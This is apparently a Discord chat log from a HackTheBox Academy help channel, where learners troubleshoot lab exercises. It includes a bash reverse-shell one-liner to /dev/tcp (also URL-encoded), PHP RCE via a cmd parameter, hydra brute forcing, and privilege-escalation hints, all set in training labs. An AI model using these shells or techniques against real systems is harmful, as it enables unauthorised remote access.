that will also work but if you use the CMD thing you will have full RCE with ?cmd=id to run the id command that you just run

Initially I was using the one liner from the module. But that stopped working and then I tried the one from pentestmonkey

for php though the simplest shell for me is the rce shell that you are using and the one i just send you but for other rev shell if you don't already know you can use https://www.revshells.com/

It just stays like this..sometimes I get a timeout error in the browser ..what is wrong in there? I used that for "Nibbles - Initial Foothold" and I was able to get the flag and now it's not working anymore.
Update: ignore the arrow from the 23 for the image.php size 😛 I am actually using port 23. Just a concidence there.

Also, the target is not expired.

Hi,

Could someone help me for the "Network Service" section of the "Password Attack" module on HTB Academy. I've been stuck on it for a while.

Thanks in advance

What exactly is not working?

sorry for the wait but i just give that a try and that payload doesn't seem to work

That is weird. It's the payload from the module and I used it to get the first flag.

I can't connect for SMB and RDP users, I'm not sure I have the correct username and password

but the python3 #2 shell on revshells seem to be working for me (my favourite shell)

could be url encoding

I also advise to use the bash -c 'bash -i' type of reverse shell.

it's just more stable and works more often in my case.

the other shell loaded find on firefox no idea why that didn't get auto url encode

try manually encoding then i guess

you can just go to a url encoder and url encode it from there

but the first pic wasn't url encoded

Send me a DM with the creds and we'll look at it together.

ippsec favourite shell doesn't seem to work 🤣

bash -c 'bash -i >& /dev/tcp/<IP>/<Port> 0>&1'

thank you, I will try it

yeah this didn't work me

do url encode it

even while url encoded?

well use python in that case, since it seems like it worked

i might redo the module later to test

could you please share the python version if that worked for you ?

yep

it's on https://revshells.com/

the python3 #2 one

thank you!

Hey, has anyone reading this completed the "Hacking Wordpress" module?

sorry buddy ik u been posting here quite alot, but i don't have the module to help you 😭

Yes

@rare topaz the weird thing is in firefix for a php RCE payload if something loaded it's will be auto url encode and in the case of my python payload it's loaded and worked so it get auto url code but for the other bash and nc payload it doesn't loaded but didn't work but it both doesn't hang and didn't get url encoded

might be the &

i think this is one of the first time i saw firefox do something like or maybe the firefox version of the pnwbox is different

in the shell? it could be

No worries, I don't expect to get help necessarily, I just try my chances since I really can't figure things out

which is why i'll test it out

well yep you are right encode all special chars work, nice catch

@tulip jasper if you want to use the other shell for some reason go on CyberChef pick url encode and check the encode all special chars box and you can use that payload for this if you want

Hey there, you are the person that tried to help and I've replied to yesterday
What process did you use to get to the last flag of the last section?
Editing the PHP file as you said is not an option sadly as I said here: #modules message

Sorry, I missed this message yesterday.
You probably just added your PHP code.
First delete all code in the 404.php and then add your code.

Thank you! I will try this since the python version doesn't work either 😦 I'm sure I messed up something and it's something really simple, but don't know what.

wait what? that also doesn't work?

oh yeah did you change your payload or are you still using the run id payload?

im dgoin the attacking web apps with ffuf and im on directory fuzzing section, im running command|| ffuf -w wordlist:FUZZ -u http://ip:port/blog/FUZZ|| but its not working?

the hint says "All lowercase" lol makes no sense

I changed the payload

if you confirm you have RCE with that payload and both the python payload and the urlcode version of the previous payload doesn't work then i'm out of idea

What's not making sence does the fuzzing scan work?
What error your receiving

WTF 🤣

You have at least enough time

Hi payloadbunny
Could you give any advise on attacking common applications- attacking Thick clients applications..
I get to following the memory map in x64gbg and dumping all user maps with -rw--
But always receiving error with de4dot that it's not .net bin file

I have not done this section yet, sorry

Stay away if you want your sanity

Anyone feel free to dm me if you've solved the above 🙏
Wasted 3days

Which one are you debugging? If its Restart-Oracle-Services.exe then you just ||need to step through the program until the banner appears||. Then go ||look in the c:\programdata folder||. Then you just need to look at what you have, and keep iterating that process.

Literally the instructions are pretty step by step.

Correct its the restart-oracle-services exe
So I just keep repeating the steps still it works

Can anyone help me with the Module: Login Brute Forcing; Section: Skills Assessment /Website (the first part of skills assessment)?

I keep getting hydra to return valid passwords to me for multiple different usernames and none of them work and open the website. I've used usernames "user", "admin", "b.gates".. My hydra commands always return passwords for these users but they do not work

The steps as shown in the chapter are exactly what you need to do

No worries about the missed message, might be cause I use the reply function without pinging, since many people get annoyed for pings on discord and I don't want to bother anyone
Anyways it still will not work, the error message that spawns after I try to update the code is: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
Either my machine has a bug (which would be weird, but not impossible) or this is not the way you've completed the module

I'll reset and retry

Additionally this has taken me so long that I've had to respawn my machine and get new IP / port pairs like 4 times now ... any help would be appreciated I am hella frustrated rn

There was an issue previously where the screenshots didn't quite line up, when debugging the restart-services.exe (note: not Restart-Oracle-Services.exe), and it confused a lot of people. But now its pretty straight forward to follow along.

I try to help pretty much everyone here. So feel free to ping me if I don't respond. At the latest when I'm back online, I'll see your message then

Send me the commands you used via DM (so as not to spoil here), and I'll be happy to take a look.

bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.16.24/4443%200%3E%261%27

i was correct.

Send me a DM, I am slowly losing track here

so what was the outcome?

Sadly, my note taking wasn't as thorough back then. But looking at my notes, it may be that ||the POST variables and form name you are using|| may not be correct.

its just not discovering any

directories

i used the same wordlist they did in the section

🤷‍♂️ :/

i'll go take a relook into the module

hold up

thanks!

the directory is not under blog

you're not meant to search recursively

you're meant to search for things like /blog, /something

not /blog/something, /blog/somethingelse

Searching recursively would be the 2nd line i mentioned

oh soo, just http:/ip/FUZZ?

not under the blog dir

yes, no /blog/FUZZ

ohhh okay thanks

you can also choose to search recursively if you want, but honestly i use feroxbuster for directory fuzzing most of the time, ffuf i use more for misc usages like bruteforcing.

feroxbuster is very fast, though.

You wouldn't use it in actual pentest if the rules have a maximum request rate.

i've ran it and

still nothing 👀

heh?

ss the output

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://178.62.68.209:30537/FUZZ

well the output long af

huh

worked for me on two different wordlists

i used this baove

above

can you try scrolling all the way up

to the instance where you used the command

oh

use -fs 986

it doesn't seem like your fuzzing isn't working

it's more like your terminal is messed up, probably cuz it's built into the web browser (ur on pwnbox)

so it bugs and continously spams ur terminal

add that to my cmd?

that worked man

thanks!

add -fs 986 -od test

ur terminal is messed up so adding any form of outputting to a file/folder will let you see the actual results

-od creates a directory that stores matching entires

you can ctrl + c out of the command cuz there's only 2 noteworthy directories to find btw

this is because your terminal is too small 🤣

he's on pwnbox so i'd assume that's why XD

that or he's genuinely running it on a very small dimension

i'm guessing the error is from the copyright thing in the wordlist you can just follow the first or second section note with using the -ic tag to ignore that

oh no i think there is a note on the first or second section about using that wordlist

i think to make thing faster because the goal of this module is using the ffuf tool not waiting the like the Fing password attack module 🤣

small dimension as in window size.

He can just use the bitquark's subdomains and it'll still work.

yea i miss read that my brain is 50% dead so it's autocomplete thing

is aight

Hey guys is anyone having any good resource to learn IoT pentesting? I would appreciate the help Or any sorts of material shared or something

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

/* 123 */     String methodName = (new Object() {  }).getClass().getEnclosingMethod().getName();
/* 124 */     logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
/* 125 */     if (AccessCheck.checkAccess(methodName, this.user)) {
/* 126 */       return "Error: Method '" + methodName + "' is not allowed for this user account";
/*     */     }
/*     */     
/* 129 */     this.action = new ActionMessage(this.sessionID, "open");
/* 130 */     this.action.addArgument(foldername);
/* 131 */     this.action.addArgument(filename);
/* 132 */     sendAndRecv();
/* 133 */     String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar";
/* 134 */     FileOutputStream fos = new FileOutputStream(desktopPath);
/*     */     if (this.response.hasError()) {
/* 136 */         return "Error: Your action caused an error on the application server!";
/*     */     }
/* 138 */       
/* 139 */     byte[] content = this.response.getContent();
/* 140 */     fos.write(content);
/*     */     fos.close();
/* 142 */     
/*     */     return "Successfully saved the file to " + desktopPath;
/*     */  }```

someone could help me with this?

it says I have an error in the line 134

fatty-client-new.jar.src\htb\fatty\client\methods\Invoker.java:134: error: cannot find symbol
/* 134 */     FileOutputStream fos = new FileOutputStream(desktopPath);
              ^
  symbol:   class FileOutputStream
  location: class Invoker
fatty-client-new.jar.src\htb\fatty\client\methods\Invoker.java:134: error: cannot find symbol
/* 134 */     FileOutputStream fos = new FileOutputStream(desktopPath);
                                         ^
  symbol:   class FileOutputStream
  location: class Invoker
2 errors```

#modules message

I'm having an issue getting the instructions from the Python Library Hijacking section in Linux Privilege Escalation to work. I've tried changing the payload to 777 using chmod and adjusting the file paths in my script to launch the attack. Nothing seems to be working. Does anyone have any hints or tips for this section?

The error I keep getting is that I don't have permission to use the payload even though it's my payload and I have full permissions over it.

Do you still have problems? In case I'll dm you

Yes, I'm not understanding this one at all. I really appreciate it!

SELECT distinct b.name

Can anyone just give me the initial foothold for the password attack medium lab

I cba trying for hours and hours to get in

Thanks

Find a file and crack it .. depending on what is services working in ports

Yeah I gathered that lol but the bruteforcing is taking ages

Like 2+hours

Then my box expired

I'm pissed icl

Are you using resources wordlist?

Yeah

I used the password list

That came up empty

Then mutated

Mutated took too long

Let me check

You will got it with mutated password list

Take a little minute

What thread do I have to use

Slight understatement 😂

Also am I correct in using ftp as ssh and ftp use them details

After get credentials Enumerate about services sharing file learning in module ..

I afraid to spoiler challenges Im not good to give hints

🥲

All good bro you've been helpful

I am working on the last portion of the Attacking Common Services Hard Lab. I am logged into the DB as the F****** user, and I am able to impersonate the J**** user. It does not show the user to have sysadmin privileges which I don't think is an issue, but I am struggling to execute commands on the linked server now and I am not sure what is wrong with my syntax.

Hello good day everyone

I want to learn cryptography wallet crashing and hacking,how to go about it ?

Did I miss something, or am I not supposed to be able to execute commands with xp_commandshell?

Why is someone not replying to me

Who should I DM?

In the module it shows how to execute on linked server

Not the channel to be asking that question, this is specifically for questions/discussions related to modules.

Would you please direct me where I can ask these questions

You want to hack crypto wallets?

Yes

How exactly will you do that legally?

You wouldn't ask for it here, you can ask in the #1024429874246590575 or #general (despite it not being a useful place).

#modules is only for HTB Academy's supported modules

No hell , it took me time and money to find the link to this community

@dusty crag i also suggest you verify in #welcome if you havn't already.

Shouldn’t ask about it anywhere since hacking crypto wallets is illegal

it's literally free and public but ok

they might be pentesting for a crypto company or whatever

Basically asking us how to steal someone’s wallet

Isn't the group about illegal stuffs

It does not seem to be passing the commands to that server

No lmfao

Yes of course

<@&861185840277487616>

Well i'll let mods handle

No. lol. It's not.

Tell me what it's all about

lol

Key word: "ethical" pentesting

If you're genuinely trying to figure out how to hack people's crypto wallets then ur in the wrong place

By joining you should have read the welcome banner, and also the #welcome channel

Plus the description of the server

exactly where i told them to go but they just ignored me 😭

The guy who watched a youtube video about a guy who got millions hacking crypto wallets

Ahhh nevermind I figured it out, thanks. I was just overcomplicating it for no reason

I think there actually are jobs for people to pentest the security of crypto related stuff.

But if bro rlly wants that $$$ then he's in the wrong hood.

😭

Good job 👍🏼😄

Tell me about it

https://google.com

Amazing resource 🫡

I am starting to prefer chat gpt for all but yea

google still god tier lol

💀 you learn pentesting from the start first, you don't just go straight into cracking them

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

That is what everybody thinks

for a good reason.

Unless you have prior experience in a tech field

top people start from the roof

then they start building the bases

/* 123 */     String methodName = (new Object() {  }).getClass().getEnclosingMethod().getName();
/* 124 */     logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
/* 125 */     if (AccessCheck.checkAccess(methodName, this.user)) {
/* 126 */       return "Error: Method '" + methodName + "' is not allowed for this user account";
/*     */     }
/*     */     
/* 129 */     this.action = new ActionMessage(this.sessionID, "open");
/* 130 */     this.action.addArgument(foldername);
/* 131 */     this.action.addArgument(filename);
/* 132 */     sendAndRecv();
/* 133 */     String desktopPath = System.getProperty("user.home") + "\\Desktop\\fatty-server.jar";
/* 134 */     FileOutputStream fos = new FileOutputStream(desktopPath);
/*     */     if (this.response.hasError()) {
/* 136 */         return "Error: Your action caused an error on the application server!";
/*     */     }
/* 138 */       
/* 139 */     byte[] content = this.response.getContent();
/* 140 */     fos.write(content);
/*     */     fos.close();
/* 142 */     
/*     */     return "Successfully saved the file to " + desktopPath;
/*     */  }```

fatty-client-new.jar.src\htb\fatty\client\methods\Invoker.java:134: error: cannot find symbol
/* 134 */     FileOutputStream fos = new FileOutputStream(desktopPath);
              ^
  symbol:   class FileOutputStream
  location: class Invoker
fatty-client-new.jar.src\htb\fatty\client\methods\Invoker.java:134: error: cannot find symbol
/* 134 */     FileOutputStream fos = new FileOutputStream(desktopPath);
                                         ^
  symbol:   class FileOutputStream
  location: class Invoker
2 errors```

https://academy.hackthebox.com/module/113/section/2164 Attacking common applications - Exploiting Web Vulnerabilities in Thick-Client Applications --Last step of path traversal.

stupid question, but does parrot OS already has a internet browser installed?. I was trying the "live engagement" exercise from the shells & payloads, but can't find a browser to use inside the parrot/pwnd machine.

open the terminal and enter firefox.

oh.. ok thank you.

Hey Guys
I stuck in dns footprinting
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
I tryed
dnsenum --dnsserver 10.129.75.61 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
nslookup 10.129.75.61
for sub in $(cat /usr/share/SecLists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt);do dig $sub.inlanefreight.htb @10.129.75.61 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done

dnsenum --dnsserver 10.129.75.61 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt dev.inlanefreight.htb

dnsenum --dnsserver 10.129.75.61 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/fierce-hostlist.txt inlanefreight.htb dev.inlanefreight.htb
dnsenum --dnsserver 10.129.75.61 --enum -p 0 -s 0 -o subdomains.txt -f /usr/share/SecLists/Discovery/DNS/subdomains-top1million-20000.txt dev.inlanefreight.htb

for sub in $(cat /opt/useful/SecLists/Discovery/DNS/fierce-hostlist.txt);do dig $sub.inlanefreight.htb @10.129.75.61 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done

no luck
Someone have any hint?

There's a pretty 'fierce' wordlist you can use with dnsenum. I hope that helps.

Why are you trying to bruteforce the main zone. It gives you all the data voluntarily 😉

??

Ok Thank you🤗

Glad I could help.

I'm in the Sudo section in Linux Privilege Escalation. I've tried all of the examples shown and nothing I've tried seem to work with getting the flag. The box shows that it should be vulnerable to the Sudo Policy Bypass exploit, but when I try it to get the flag I get a permission denied error. Does anyone have any hints or clues on this one?

try ||sudo -l||